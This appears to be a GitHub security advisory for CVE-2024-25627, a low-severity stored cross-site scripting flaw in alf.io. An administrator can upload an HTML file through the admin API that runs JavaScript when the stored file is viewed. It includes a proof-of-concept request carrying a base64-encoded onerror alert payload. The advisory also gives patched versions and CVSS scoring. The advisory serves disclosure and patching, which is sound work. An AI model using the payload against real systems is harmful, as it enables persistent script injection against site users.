Skip to content

Cross-Site Scripting (XSS) via File Upload

Low
cbellone published GHSA-gpmg-8f92-37cf Feb 16, 2024

Package

docker alfio/alf.io (Docker)

Affected versions

< 2.0-M4-2304

Patched versions

2.0-M4-2402

Description

Summary

An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads.

Details

An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads.

PoC

An admin can make the following POST request to /admin/api/file/upload.
The data looks as follows.

{"file":"PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik+",
"type":"text/html",
"name":"ANYTHING"}

The file key holds <img src=x onerror=alert(document.domain)> base64 encoded.
image

Now, upon visiting /file/9e35e10c75a7817ebd66d4345b99a05eeb5ef5810a11acb22303d704aa4595c0, the payload triggers.
image

Impact

An attacker gaining administrative access to the alf.io application may be able to persist access by planting an XSS payload.

Severity

Low
3.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

CVE ID

CVE-2024-25627

Weaknesses

Credits